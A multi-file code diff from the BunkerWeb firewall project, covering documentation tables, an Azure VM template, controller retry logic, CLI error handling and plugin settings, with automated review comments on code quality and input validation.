|`REPORTING_SMTP_FROM_USER` | |global |no |The user authentication value for sending via the from email address. |
|`REPORTING_SMTP_FROM_PASSWORD`| |global |no |The password authentication value for sending via the from email address. |
|`REPORTING_SMTP_SSL` |`SSL` |global |no |Determine whether or not to use a secure connection for SMTP. |
| Setting | Default |Context|Multiple| Description |
|------------------------------|------------------|-------|--------|----------------------------------------------------------------------------------------------------------------------------------|
|`USE_REPORTING_SMTP` |`no` |global |no |Enable sending the report via email. |
|`USE_REPORTING_WEBHOOK` |`no` |global |no |Enable sending the report via webhook. |
|`REPORTING_SCHEDULE` |`weekly` |global |no |The frequency at which reports are sent. |
|`REPORTING_WEBHOOK_URLS` | |global |no |List of webhook URLs to receive the report in Markdown (separated by spaces). |
|`REPORTING_SMTP_EMAILS` | |global |no |List of email addresses to receive the report in HTML format (separated by spaces). |
|`REPORTING_SMTP_HOST` | |global |no |The host server used for SMTP sending. |
|`REPORTING_SMTP_PORT` |`465` |global |no |The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587).|
|`REPORTING_SMTP_FROM_EMAIL` | |global |no |The email address used as the sender. Note that 2FA must be disabled for this email address. |
|`REPORTING_SMTP_FROM_USER` | |global |no |The user authentication value for sending via the from email address. |
|`REPORTING_SMTP_FROM_PASSWORD`| |global |no |The password authentication value for sending via the from email address. |
|`REPORTING_SMTP_SSL` |`SSL` |global |no |Determine whether or not to use a secure connection for SMTP. |
|`REPORTING_SMTP_SUBJECT` |`BunkerWeb Report`|global |no |The subject line of the email. |
## Reverse proxy
@ -587,8 +590,9 @@ Manage reverse proxy configurations.
|---------------------------------------|----------------------------------|---------|--------|-----------------------------------------------------------------------------------------------------------------------------|
|`USE_REVERSE_PROXY` |`no` |multisite|no |Activate reverse proxy mode. |
|`REVERSE_PROXY_INTERCEPT_ERRORS` |`yes` |multisite|no |Intercept and rewrite errors. |
|`REVERSE_PROXY_CUSTOM_HOST` | |multisite|no |Override Host header sent to upstream server. |
|`REVERSE_PROXY_HOST` | |multisite|yes |Full URL of the proxied resource (proxy_pass). |
|`REVERSE_PROXY_URL` | |multisite|yes |Location URL that will be proxied. |
|`REVERSE_PROXY_URL` |`/` |multisite|yes |Location URL that will be proxied. |
|`REVERSE_PROXY_WS` |`no` |multisite|yes |Enable websocket on the proxied resource. |
|`REVERSE_PROXY_HEADERS` | |multisite|yes |List of HTTP headers to send to proxied resource separated with semicolons (values for proxy_set_header directive). |
|`REVERSE_PROXY_HEADERS_CLIENT` | |multisite|yes |List of HTTP headers to send to client separated with semicolons (values for add_header directive). |
@ -597,6 +601,10 @@ Manage reverse proxy configurations.
|`REVERSE_PROXY_AUTH_REQUEST` | |multisite|yes |Enable authentication using an external provider (value of auth_request directive). |
|`REVERSE_PROXY_AUTH_REQUEST_SIGNIN_URL`| |multisite|yes |Redirect clients to sign-in URL when using REVERSE_PROXY_AUTH_REQUEST (used when auth_request call returned 401). |
|`REVERSE_PROXY_AUTH_REQUEST_SET` | |multisite|yes |List of variables to set from the authentication provider, separated with semicolons (values of auth_request_set directives).|
|`REVERSE_PROXY_CONNECT_TIMEOUT` |`60s` |multisite|yes |Timeout when connecting to the proxied resource. |
|`REVERSE_PROXY_READ_TIMEOUT` |`60s` |multisite|yes |Timeout when reading from the proxied resource. |
|`REVERSE_PROXY_SEND_TIMEOUT` |`60s` |multisite|yes |Timeout when sending to the proxied resource. |
|`REVERSE_PROXY_INCLUDES` | |multisite|yes |Additional configuration to include in the location block, separated with spaces. |
|`USE_PROXY_CACHE` |`no` |multisite|no |Enable or disable caching of the proxied resources. |
|`PROXY_CACHE_PATH_LEVELS` |`1:2` |global |no |Hierarchy levels of the cache. |
|`PROXY_CACHE_PATH_ZONE_SIZE` |`10m` |global |no |Maximum size of cached metadata when caching proxied resources. |
@ -607,11 +615,6 @@ Manage reverse proxy configurations.
|`PROXY_CACHE_VALID` |`200=24h 301=1h 302=24h` |multisite|no |Define the caching time depending on the HTTP status code (list of status=time), separated with spaces. |
|`PROXY_NO_CACHE` |`$http_pragma $http_authorization`|multisite|no |Conditions to disable caching of responses. |
|`PROXY_CACHE_BYPASS` |`0` |multisite|no |Conditions to bypass caching of responses. |
|`REVERSE_PROXY_CONNECT_TIMEOUT` |`60s` |multisite|yes |Timeout when connecting to the proxied resource. |
|`REVERSE_PROXY_READ_TIMEOUT` |`60s` |multisite|yes |Timeout when reading from the proxied resource. |
|`REVERSE_PROXY_SEND_TIMEOUT` |`60s` |multisite|yes |Timeout when sending to the proxied resource. |
|`REVERSE_PROXY_INCLUDES` | |multisite|yes |Additional configuration to include in the location block, separated with spaces. |
|`REVERSE_PROXY_CUSTOM_HOST` | |multisite|no |Override Host header sent to upstream server. |
## Reverse scan
@ -674,13 +677,13 @@ Allow access based on internal and external IP/network/rDNS/ASN whitelists.
|---------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|----------------------------------------------------------------------------------|
|`USE_WHITELIST` |`yes` |multisite|no |Activate whitelist feature. |
|`WHITELIST_IP` |`20.191.45.212 40.88.21.235 40.76.173.151 40.76.163.7 20.185.79.47 52.142.26.175 20.185.79.15 52.142.24.149 40.76.162.208 40.76.163.23 40.76.162.191 40.76.162.247` |multisite|no |List of IP/network, separated with spaces, to put into the whitelist. |
|`WHITELIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to whitelist. |
|`WHITELIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS whitelist checks on global IP addresses. |
|`WHITELIST_RDNS` |`.google.com .googlebot.com .yandex.ru .yandex.net .yandex.com .search.msn.com .baidu.com .baidu.jp .crawl.yahoo.net .fwd.linkedin.com .twitter.com .twttr.com .discord.com`|multisite|no |List of reverse DNS suffixes, separated with spaces, to whitelist. |
|`WHITELIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist.|
|`WHITELIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS whitelist checks on global IP addresses. |
|`WHITELIST_ASN` |`32934` |multisite|no |List of ASN numbers, separated with spaces, to whitelist. |
|`WHITELIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to whitelist. |
|`WHITELIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to whitelist. |
|`WHITELIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to whitelist. |
|`WHITELIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to whitelist. |
|`WHITELIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to whitelist. |
|`WHITELIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to whitelist.|
|`WHITELIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to whitelist. |
|`WHITELIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to whitelist. |
|`WHITELIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to whitelist. |


@ -89,32 +89,6 @@ Here is how you can access the logs, depending on your integration :
cat /var/log/bunkerweb/access.log
```
=== "Ansible"
For errors related to BunkerWeb services (e.g. not starting), you can use `journalctl` :
```shell
ansible -i inventory.yml all -a "journalctl -u bunkerweb --no-pager" --become
```
Common logs are located inside the `/var/log/bunkerweb` directory :
```shell
ansible -i inventory.yml all -a "cat /var/log/bunkerweb/error.log" --become
ansible -i inventory.yml all -a "cat /var/log/bunkerweb/access.log" --become
```
=== "Vagrant"
For errors related to BunkerWeb services (e.g. not starting), you can use `journalctl` :
```shell
journalctl -u bunkerweb --no-pager
```
Common logs are located inside the `/var/log/bunkerweb` directory :
```shell
cat /var/log/bunkerweb/error.log
cat /var/log/bunkerweb/access.log
```
## Permissions
Don't forget that BunkerWeb runs as an unprivileged user for obvious security reasons. Double-check the permissions of files and folders used by BunkerWeb, especially if you use custom configurations (more info [here](quickstart-guide.md#custom-configurations)). You will need to set at least **RW** rights on files and **_RWX_** on folders.
@ -267,20 +241,6 @@ You can manually unban an IP which can be useful when doing some tests but it ne
sudo bwcli unban 1.2.3.4
```
=== "Ansible"
You can use the `bwcli` command :
```shell
ansible -i inventory.yml all -a "bwcli unban 1.2.3.4" --become
```
=== "Vagrant"
You can use the `bwcli` command (as root) :
```shell
sudo bwcli unban 1.2.3.4
```
## Whitelisting
If you have bots that need to access your website, the recommended way to avoid any false positive is to whitelist them using the [whitelisting feature](security-tuning.md#blacklisting-and-whitelisting). We don't recommend using the `WHITELIST_URI*` or `WHITELIST_USER_AGENT*` settings unless they are set to secret and unpredictable values. Common use cases are :


@ -151,7 +151,7 @@
3. **Stop the services**:
```bash
systemctl stop bunkerweb-scheduler
systemctl stop bunkerweb
systemctl stop bunkerweb-ui
```
@ -275,7 +275,7 @@
4. **Stop the services**.
```bash
systemctl stop bunkerweb-scheduler
systemctl stop bunkerweb
systemctl stop bunkerweb-ui
```


@ -1607,117 +1607,8 @@ After a successful login/password combination, you will be prompted to enter you
www.example.com_MAX_CLIENT_SIZE=50m
```
Don't forget to restart the `bunkerweb` service :
Don't forget to reload the `bunkerweb` service :
```shell
systemctl restart bunkerweb
```
=== "Ansible"
The installation of the web UI using the [Vagrant integration](integrations.md#linux) is pretty straightforward because it is installed with BunkerWeb.
Create a `my_ui.env` filed used to configure the web UI :
```conf
ADMIN_USERNAME=changeme
ADMIN_PASSWORD=changeme
```
Here is the `my_variables.env` boilerplate you can use :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
SERVER_NAME=www.example.com
MULTISITE=yes
www.example.com_USE_UI=yes
www.example.com_USE_REVERSE_PROXY=yes
www.example.com_REVERSE_PROXY_URL=/changeme
www.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:7000
www.example.com_INTERCEPTED_ERROR_CODES=400 404 405 413 429 500 501 502 503 504
www.example.com_MAX_CLIENT_SIZE=50m
```
The variable `enable_ui` can be set to `true` in order to activate the web UI service and the variable `custom_ui` can be used to specify the configuration file for the web UI :
```ini
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env" enable_ui=true custom_ui="{{ playbook_dir }}/my_ui.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
- enable_ui: true
- custom_ui: "{{ playbook_dir }}/my_ui.env"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook and be able to access the web UI :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
The installation of the web UI using the [Vagrant integration](integrations.md#vagrant) is pretty straightforward because it is installed with BunkerWeb.
First of all, you will need to get a shell on your Vagrant box :
```shell
vagrant ssh
```
The web UI comes as systemd service named `bunkerweb-ui` which is not enabled by default. If you want to start the web UI when on startup you can run the following command :
```shell
systemctl enable bunkerweb-ui
```
A dedicated environment file located at `/etc/bunkerweb/ui.env` is used to configure the web UI :
```conf
ADMIN_USERNAME=changeme
ADMIN_PASSWORD=changeme
```
Each time you edit the `/etc/bunkerweb/ui.env` file, you will need to restart the service :
```shell
systemctl restart bunkerweb-ui
```
Accessing the web UI through BunkerWeb is a classical [reverse proxy setup](quickstart-guide.md#protect-http-applications). Please note that the web UI is listening on the `7000` port and only on the loopback interface.
Here is the `/etc/bunkerweb/variables.env` boilerplate you can use :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
SERVER_NAME=www.example.com
MULTISITE=yes
www.example.com_USE_UI=yes
www.example.com_USE_REVERSE_PROXY=yes
www.example.com_REVERSE_PROXY_URL=/changeme
www.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:7000
www.example.com_INTERCEPTED_ERROR_CODES=400 404 405 413 429 500 501 502 503 504
www.example.com_MAX_CLIENT_SIZE=50m
```
Don't forget to restart the `bunkerweb` service :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```


@ -2,6 +2,7 @@
"name": "cors",
"kinds": ["docker", "autoconf", "linux"],
"timeout": 120,
"delay": 120,
"tests": [
{
"type": "string",


@ -2,7 +2,7 @@
"name": "ghost",
"kinds": ["docker", "autoconf", "swarm", "kubernetes"],
"timeout": 60,
"delay": 240,
"delay": 300,
"tests": [
{
"type": "string",


@ -1,6 +1,7 @@
{
"name": "proxy-protocol",
"kinds": ["docker"],
"delay": 30,
"timeout": 60,
"tests": [
{


@ -0,0 +1,236 @@
{
"$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"location": {
"type": "string"
},
"networkInterfaceName1": {
"type": "string"
},
"networkSecurityGroupName": {
"type": "string"
},
"networkSecurityGroupRules": {
"type": "array"
},
"subnetName": {
"type": "string"
},
"virtualNetworkName": {
"type": "string"
},
"addressPrefixes": {
"type": "array"
},
"subnets": {
"type": "array"
},
"publicIpAddressName1": {
"type": "string"
},
"publicIpAddressType": {
"type": "string"
},
"publicIpAddressSku": {
"type": "string"
},
"pipDeleteOption": {
"type": "string"
},
"virtualMachineName": {
"type": "string"
},
"virtualMachineName1": {
"type": "string"
},
"virtualMachineComputerName1": {
"type": "string"
},
"virtualMachineRG": {
"type": "string"
},
"osDiskType": {
"type": "string"
},
"osDiskDeleteOption": {
"type": "string"
},
"virtualMachineSize": {
"type": "string"
},
"nicDeleteOption": {
"type": "string"
},
"hibernationEnabled": {
"type": "bool"
},
"adminUsername": {
"type": "string"
},
"securityType": {
"type": "string"
},
"secureBoot": {
"type": "bool"
},
"vTPM": {
"type": "bool"
},
"virtualMachine1Zone": {
"type": "string"
}
},
"variables": {
"nsgId": "[resourceId(resourceGroup().name, 'Microsoft.Network/networkSecurityGroups', parameters('networkSecurityGroupName'))]",
"vnetName": "[parameters('virtualNetworkName')]",
"vnetId": "[resourceId(resourceGroup().name,'Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]",
"subnetRef": "[concat(variables('vnetId'), '/subnets/', parameters('subnetName'))]"
},
"resources": [
{
"name": "[parameters('networkInterfaceName1')]",
"type": "Microsoft.Network/networkInterfaces",
"apiVersion": "2022-11-01",
"location": "[parameters('location')]",
"dependsOn": [
"[concat('Microsoft.Network/networkSecurityGroups/', parameters('networkSecurityGroupName'))]",
"[concat('Microsoft.Network/virtualNetworks/', parameters('virtualNetworkName'))]",
"[concat('Microsoft.Network/publicIpAddresses/', parameters('publicIpAddressName1'))]"
],
"properties": {
"ipConfigurations": [
{
"name": "ipconfig1",
"properties": {
"subnet": {
"id": "[variables('subnetRef')]"
},
"privateIPAllocationMethod": "Dynamic",
"publicIpAddress": {
"id": "[resourceId(resourceGroup().name, 'Microsoft.Network/publicIpAddresses', parameters('publicIpAddressName1'))]",
"properties": {
"deleteOption": "[parameters('pipDeleteOption')]"
}
}
}
}
],
"networkSecurityGroup": {
"id": "[variables('nsgId')]"
}
}
},
{
"name": "[parameters('networkSecurityGroupName')]",
"type": "Microsoft.Network/networkSecurityGroups",
"apiVersion": "2020-05-01",
"location": "[parameters('location')]",
"properties": {
"securityRules": "[parameters('networkSecurityGroupRules')]"
}
},
{
"name": "[parameters('virtualNetworkName')]",
"type": "Microsoft.Network/virtualNetworks",
"apiVersion": "2023-02-01",
"location": "[parameters('location')]",
"properties": {
"addressSpace": {
"addressPrefixes": "[parameters('addressPrefixes')]"
},
"subnets": "[parameters('subnets')]"
}
},
{
"name": "[parameters('publicIpAddressName1')]",
"type": "Microsoft.Network/publicIpAddresses",
"apiVersion": "2020-08-01",
"location": "[parameters('location')]",
"properties": {
"publicIpAllocationMethod": "[parameters('publicIpAddressType')]"
},
"sku": {
"name": "[parameters('publicIpAddressSku')]"
},
"zones": [
"[parameters('virtualMachine1Zone')]"
]
},
{
"name": "[parameters('virtualMachineName1')]",
"type": "Microsoft.Compute/virtualMachines",
"apiVersion": "2024-03-01",
"location": "[parameters('location')]",
"dependsOn": [
"[concat('Microsoft.Network/networkInterfaces/', parameters('networkInterfaceName1'))]"
],
"properties": {
"hardwareProfile": {
"vmSize": "[parameters('virtualMachineSize')]"
},
"storageProfile": {
"osDisk": {
"createOption": "fromImage",
"managedDisk": {
"storageAccountType": "[parameters('osDiskType')]"
},
"deleteOption": "[parameters('osDiskDeleteOption')]"
},
"imageReference": {
"publisher": "bunkerity",
"offer": "bunkerweb",
"sku": "bunkerweb",
"version": "latest"
}
},
"networkProfile": {
"networkInterfaces": [
{
"id": "[resourceId('Microsoft.Network/networkInterfaces', parameters('networkInterfaceName1'))]",
"properties": {
"deleteOption": "[parameters('nicDeleteOption')]"
}
}
]
},
"additionalCapabilities": {
"hibernationEnabled": false
},
"osProfile": {
"computerName": "[parameters('virtualMachineComputerName1')]",
"adminUsername": "[parameters('adminUsername')]",
"linuxConfiguration": {
"disablePasswordAuthentication": true
}
},
"securityProfile": {
"securityType": "[parameters('securityType')]",
"uefiSettings": {
"secureBootEnabled": "[parameters('secureBoot')]",
"vTpmEnabled": "[parameters('vTPM')]"
}
},
"diagnosticsProfile": {
"bootDiagnostics": {
"enabled": true
}
}
},
"plan": {
"name": "bunkerweb",
"publisher": "bunkerity",
"product": "bunkerweb"
},
"zones": [
"[parameters('virtualMachine1Zone')]"
]
}
],
"outputs": {
"adminUsername": {
"type": "string",
"value": "[parameters('adminUsername')]"
}
}
}
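Review bot: The `hibernationEnabled` parameter is declared but never referenced — the VM resource hard-codes `"hibernationEnabled": false` under `additionalCapabilities`, so a caller who sets the parameter gets no effect; either use `"hibernationEnabled": "[parameters('hibernationEnabled')]"` or drop the parameter, and `virtualMachineName` and `virtualMachineRG` are likewise declared and unused. `linuxConfiguration` sets `disablePasswordAuthentication: true` but carries no `ssh.publicKeys` block, and the template exposes neither an SSH-key nor an `adminPassword` parameter, so unless the marketplace image provisions access some other way (confirm), the deployed VM has no configured login; a string parameter wired into `ssh.publicKeys[].keyData` (with `path` under the admin user's `.ssh/authorized_keys`) would close that gap. `securityType`, `secureBoot` and `vTPM` have no `defaultValue` or `allowedValues`, so nothing documents or enforces the intended posture — `"defaultValue": "TrustedLaunch"` for `securityType` with `true` defaults for the two booleans would make the hardened configuration the default rather than something each caller must remember. The NIC attaches a public IP directly and the NSG takes `networkSecurityGroupRules` verbatim, so the VM's inbound exposure is entirely determined by the caller's rules array; a `metadata.description` on that parameter stating that inbound rules should be limited to the ports the image needs would help readers of the template.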


@ -61,6 +61,23 @@ class Config(ConfigCaller):
return True
return False
def wait_applying(self):
i = 0
while i < 10:
curr_changes = self._db.check_changes()
if isinstance(curr_changes, str):
self.__logger.error(f"An error occurred when checking for changes in the database : {curr_changes}")
elif not any(curr_changes.values()):
break
else:
self.__logger.warning(
"Scheduler is already applying a configuration, retrying in 5 seconds ...",
)
i += 1
sleep(5)
if i >= 10:
raise Exception("Too many retries while waiting for scheduler to apply configuration...")
def apply(self, instances, services, configs={}, first=False) -> bool:
success = True
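Review bot: `wait_applying` sleeps 5 seconds after its tenth failed poll and only then raises, so the final retry costs an extra 5 seconds for nothing, and the `i`/`while` bookkeeping plus the trailing `if i >= 10` duplicates the loop bound in two places; a `for`/`else` expresses the same retry budget without the counter and stops sleeping once the budget is spent. The string-error branch (`check_changes()` returning a `str`) is retried like a busy scheduler rather than failing fast — if that is intended, a one-line comment saying so would keep the next reader from "fixing" it. The method also has no docstring; something like `"""Block until the scheduler reports no pending changes, polling every 5 s for at most 10 attempts; raises if it never settles."""` states the contract callers rely on. `sleep` is not imported within the hunk, so presumably it comes from a `from time import sleep` at the top of the file — confirm.
```python
    def wait_applying(self):
        """Block until the scheduler reports no pending changes, polling every 5 s for at most 10 attempts; raises if it never settles."""
        for _ in range(10):
            curr_changes = self._db.check_changes()
            if isinstance(curr_changes, str):
                # A string is an error report from the db layer; keep polling rather than failing fast.
                self.__logger.error(f"An error occurred when checking for changes in the database : {curr_changes}")
            elif not any(curr_changes.values()):
                return
            else:
                self.__logger.warning("Scheduler is already applying a configuration, retrying in 5 seconds ...")
            sleep(5)
        else:
            raise Exception("Too many retries while waiting for scheduler to apply configuration...")
```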


@ -120,6 +120,7 @@ class DockerController(Controller):
try:
if not self.__process_event(event):
continue
self.wait_applying()
self._update_settings()
self._instances = self.get_instances()
self._services = self.get_services()
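Review bot: `wait_applying()` raises a plain `Exception` after roughly 50 seconds of polling, and this call site (and the same one-line insertion in `SwarmController`) sits inside a `try` whose handler is outside the hunk, so whether a timeout is logged and the event loop continues, or the whole watcher dies, cannot be confirmed from here. In `IngressController` the call comes right after the `__internal_lock.release()`/`continue` path with no `try` visible around it, so an exception from `wait_applying()` would propagate out of the loop — and, if the lock is still held on that path, leave it held; a dedicated `except Exception` that logs the timeout and releases the lock before continuing would keep all three controllers consistent. The enclosing loop starts and ends outside the hunk in every controller.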


@ -278,6 +278,7 @@ class IngressController(Controller):
self.__internal_lock.release()
locked = False
continue
self.wait_applying()
self._update_settings()
self._instances = self.get_instances()
self._services = self.get_services()


@ -157,6 +157,7 @@ class SwarmController(Controller):
locked = False
continue
try:
self.wait_applying()
self._update_settings()
self._instances = self.get_instances()
self._services = self.get_services()


@ -606,6 +606,7 @@ utils.get_session = function(ctx)
logger:log(ERR, "error while getting variable SESSIONS_CHECK_" .. check .. " : " .. err)
elseif check_value == "yes" and value ~= metadata[check] then
logger:log(WARN, "session check failed : " .. check .. "!=" .. metadata[check])
session:clear_request_cookie()
local ok
ok, err = session:destroy()
if not ok then
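Review bot: The new `session:clear_request_cookie()` call has no comment explaining why it must precede `session:destroy()`, and unlike `destroy()` its result is not checked, so a reader cannot tell whether a failure there is harmless. Presumably the intent is to strip the session cookie from the current request's headers so a session that just failed its `SESSIONS_CHECK_*` comparison is not forwarded upstream during the rest of this request — confirm against the session library's documentation, then record it as `-- strip the rejected session cookie from the request so it is not forwarded upstream before the session is destroyed`. `utils.get_session` starts and ends outside the hunk.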


@ -223,8 +223,11 @@ class CLI(ApiCaller):
except Exception as e:
self.__logger.error(f"Failed to delete ban for {ip} from redis: {e}")
if self.send_to_apis("POST", "/unban", data={"ip": ip}):
return True, f"IP {ip} has been unbanned"
try:
if self.send_to_apis("POST", "/unban", data={"ip": ip}):
return True, f"IP {ip} has been unbanned"
except BaseException as e:
return False, f"Failed to unban {ip}: {e}"
return False, f"Failed to unban {ip}"
def ban(self, ip: str, exp: float, reason: str) -> Tuple[bool, str]:
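Review bot: `except BaseException as e:` around `send_to_apis` also swallows `KeyboardInterrupt` and `SystemExit`, so a Ctrl-C while the CLI is waiting on the API is turned into a `(False, "Failed to unban ...")` result instead of stopping the process; the same clause is added in `ban` and `bans` in the next hunk. The redis branch a few lines above already uses `except Exception as e:`, so narrowing the three new handlers to `except Exception as e:` also makes the error handling in this method consistent with its own first half. The full exception text is interpolated into the user-facing message; that is fine for a local CLI, but worth a glance if these strings are ever surfaced through the web UI.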
@ -237,14 +240,20 @@ class CLI(ApiCaller):
except Exception as e:
self.__logger.error(f"Failed to ban {ip} in redis: {e}")
if self.send_to_apis("POST", "/ban", data={"ip": ip, "exp": exp, "reason": reason}):
return (True, f"IP {ip} has been banned for {format_remaining_time(exp)} with reason {reason}")
try:
if self.send_to_apis("POST", "/ban", data={"ip": ip, "exp": exp, "reason": reason}):
return True, f"IP {ip} has been banned for {format_remaining_time(exp)} with reason {reason}"
except BaseException as e:
return False, f"Failed to ban {ip}: {e}"
return False, f"Failed to ban {ip}"
def bans(self) -> Tuple[bool, str]:
servers = {}
ret, resp = self.send_to_apis("GET", "/bans", response=True)
try:
ret, resp = self.send_to_apis("GET", "/bans", response=True)
except BaseException as e:
return False, f"Failed to get bans: {e}"
if not ret:
return False, "error"


@ -32,6 +32,24 @@
"regex": "^\\/[\\w\\].~:\\/?#\\[@!$\\&'\\(\\)*+,;=\\-]*$",
"type": "text"
},
"ANTIBOT_TIME_RESOLVE": {
"context": "multisite",
"default": "60",
"help": "Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.",
"id": "antibot-time-resolve",
"label": "Time to resolve",
"regex": "^[0-9]+$",
"type": "text"
},
"ANTIBOT_TIME_VALID": {
"context": "multisite",
"default": "86400",
"help": "Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one.",
"id": "antibot-time-valid",
"label": "Time valid",
"regex": "^[0-9]+$",
"type": "text"
},
"ANTIBOT_RECAPTCHA_SCORE": {
"context": "multisite",
"default": "0.7",
@ -94,24 +112,6 @@
"label": "Turnstile secret",
"regex": "^(0x[\\w\\-]+)?$",
"type": "password"
},
"ANTIBOT_TIME_RESOLVE": {
"context": "multisite",
"default": "60",
"help": "Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.",
"id": "antibot-time-resolve",
"label": "Time to resolve",
"regex": "^[0-9]+$",
"type": "text"
},
"ANTIBOT_TIME_VALID": {
"context": "multisite",
"default": "86400",
"help": "Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one.",
"id": "antibot-time-valid",
"label": "Time valid",
"regex": "^[0-9]+$",
"type": "text"
}
}
}


@ -9,14 +9,14 @@ def pre_render(**kwargs):
"value": data.get("counter_failed_challenges", 0),
"title": "Challenge",
"subtitle": "Failed",
"subtitle_color": "info",
"svg_color": "blue",
"subtitle_color": "error",
"svg_color": "red",
}
}
except BaseException:
print(format_exc(), flush=True)
return {
"counter_failed_challenges": {"value": "unknown", "title": "Challenge", "subtitle": "Failed", "subtitle_color": "info", "svg_color": "blue"},
"counter_failed_challenges": {"value": "unknown", "title": "Challenge", "subtitle": "Failed", "subtitle_color": "error", "svg_color": "red"},
"error": format_exc(),
}


@ -14,19 +14,10 @@
"regex": "^(yes|no)$",
"type": "check"
},
"BACKUP_DIRECTORY": {
"context": "global",
"default": "/var/lib/bunkerweb/backups",
"help": "The directory where the backup will be stored",
"id": "backup-directory",
"label": "Backup directory",
"regex": "^.*$",
"type": "text"
},
"BACKUP_SCHEDULE": {
"context": "global",
"default": "daily",
"help": "The frequency of the backup",
"help": "The frequency of the backup (daily, weekly or monthly)",
"id": "backup-schedule",
"label": "Backup schedule",
"regex": "^(daily|weekly|monthly)$",
@ -41,6 +32,15 @@
"label": "Backup rotation",
"regex": "^[1-9][0-9]*$",
"type": "text"
},
"BACKUP_DIRECTORY": {
"context": "global",
"default": "/var/lib/bunkerweb/backups",
"help": "The directory where the backup will be stored",
"id": "backup-directory",
"label": "Backup directory",
"regex": "^.*$",
"type": "text"
}
},
"jobs": [


@ -23,15 +23,6 @@
"regex": "^( *([1-5]\\d{2})(?!.*\\2) *)+$",
"type": "text"
},
"BAD_BEHAVIOR_BAN_TIME": {
"context": "multisite",
"default": "86400",
"help": "The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.",
"id": "bad-behavior-ban-time",
"label": "Ban duration (in seconds)",
"regex": "^\\d+",
"type": "text"
},
"BAD_BEHAVIOR_THRESHOLD": {
"context": "multisite",
"default": "10",
@ -49,6 +40,15 @@
"label": "Period (in seconds)",
"regex": "^\\d+",
"type": "text"
},
"BAD_BEHAVIOR_BAN_TIME": {
"context": "multisite",
"default": "86400",
"help": "The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.",
"id": "bad-behavior-ban-time",
"label": "Ban duration (in seconds)",
"regex": "^\\d+",
"type": "text"
}
}
}
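Review bot: The moved `BAD_BEHAVIOR_BAN_TIME` entry keeps `"regex": "^\\d+"` without a trailing `$`, so a value such as `86400abc` passes validation and whatever consumes the setting as an integer is left to deal with the garbage; the period setting in the context lines just above has the same unanchored pattern (pre-existing). The antibot settings in this same commit use `^[0-9]+$`, so `"regex": "^\\d+$",` here would both close the hole and match the convention used elsewhere in the settings files.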


@ -23,13 +23,13 @@
"regex": "^(?! )( *(((\\b25[0-5]|\\b2[0-4]\\d|\\b[01]?\\d\\d?)(\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)){3})(\\/([1-2][0-9]?|3[0-2]?|[04-9]))?|(([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]Z{0,4}){0,4}%[0-9a-zA-Z]+|::(ffff(:0{1,4})?:)?((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d)|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d))(\\/(12[0-8]|1[01][0-9]|[0-9][0-9]?))?)(?!.*\\D\\2([^\\d\\/]|$)) *)*$",
"type": "text"
},
"BLACKLIST_IP_URLS": {
"context": "global",
"default": "https://www.dan.me.uk/torlist/?exit",
"help": "List of URLs, separated with spaces, containing bad IP/network to block.",
"id": "blacklist-ip-urls",
"label": "Blacklist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"BLACKLIST_RDNS": {
